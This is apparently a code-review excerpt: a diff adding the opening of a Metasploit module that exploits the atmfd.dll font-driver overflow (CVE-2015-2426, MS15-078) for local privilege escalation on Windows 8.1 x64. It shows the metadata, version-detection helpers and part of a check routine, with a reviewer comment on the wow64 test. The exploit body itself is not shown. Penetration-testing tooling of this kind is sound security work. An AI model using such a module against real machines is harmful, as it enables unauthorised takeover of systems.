modules/exploits/windows/local/ms15_078_atmfd_bof.rb

```diff
@@ -0,0 +1,178 @@
+        This module exploits a pool based buffer overflow in the atmfd.dll driver when parsing
+        a malformed font. The vulnerability was exploited by the hacking team and disclosed on
+        the july data leak. This module has been tested successfully on vulnerable builds of
+        Windows 8.1 x64.
+      },
+      'License'         => MSF_LICENSE,
+      'Author'          => [
+          'Eugene Ching',    # vulnerability discovery and exploit
+          'Mateusz Jurczyk', # vulnerability discovery
+          'Cedric Halbronn', # vulnerability and exploit analysis
+          'juan vazquez'     # msf module
+        ],
+      'Arch'            => ARCH_X86_64,
+      'Platform'        => 'win',
+      'SessionTypes'    => [ 'meterpreter' ],
+      'DefaultOptions'  => {
+          'EXITFUNC'    => 'thread',
+        },
+      'Targets'         => [
+          [ 'Windows 8.1 x64',  { } ]
+        ],
+      'Payload'         => {
+          'Space'       => 4096,
+          'DisableNops' => true
+        },
+      'References'      => [
+          ['CVE', '2015-2426'],
+          ['CVE', '2015-2433'],
+          ['MSB', 'MS15-078'],
+          ['MSB', 'MS15-080'],
+          ['URL', 'https://github.com/vlad902/hacking-team-windows-kernel-lpe'],
+          ['URL', 'https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2015/september/exploiting-cve-2015-2426-and-how-i-ported-it-to-a-recent-windows-8.1-64-bit/'],
+          ['URL', 'https://code.google.com/p/google-security-research/issues/detail?id=369'],
+          ['URL', 'https://code.google.com/p/google-security-research/issues/detail?id=480']
+        ],
+      'DisclosureDate'  => 'Jul 11 2015',
+      'DefaultTarget'   => 0
+    }))
+  end
+
+  def atmfd_version
+    file_path = expand_path('%windir%') << '\\system32\\atmfd.dll'
+    major, minor, build, revision, branch = file_version(file_path)
+    return nil if major.nil?
+    ver = "#{major}.#{minor}.#{build}.#{revision}"
+    vprint_status("atmfd.dll file version: #{ver} branch: #{branch}")
+
+    ver
+  end
+
+  def win32k_version
+    file_path = expand_path('%windir%') << '\\system32\\win32k.sys'
+    major, minor, build, revision, branch = file_version(file_path)
+    return nil if major.nil?
+    ver = "#{major}.#{minor}.#{build}.#{revision}"
+    vprint_status("win32k.sys file version: #{ver} branch: #{branch}")
+
+    ver
+  end
+
+  def ntoskrnl_version
+    file_path = expand_path('%windir%') << '\\system32\\ntoskrnl.exe'
+    major, minor, build, revision, branch = file_version(file_path)
+    return nil if major.nil?
+    ver = "#{major}.#{minor}.#{build}.#{revision}"
+    vprint_status("ntoskrnl.exe file version: #{ver} branch: #{branch}")
+
+    ver
+  end
+
+  def check
+    # We have tested only windows 8.1
+    if sysinfo['OS'] !~ /Windows 8/i
+      return Exploit::CheckCode::Unknown
+    end
+
+    # We have tested only 64 bits
+    if sysinfo['Architecture'] !~ /(wow|x)64/i
```

Comment:
wow64 indicates the system is 64 bits, we just need a 64 bits meterpreter into a 64 bits process. But we can check the installation still.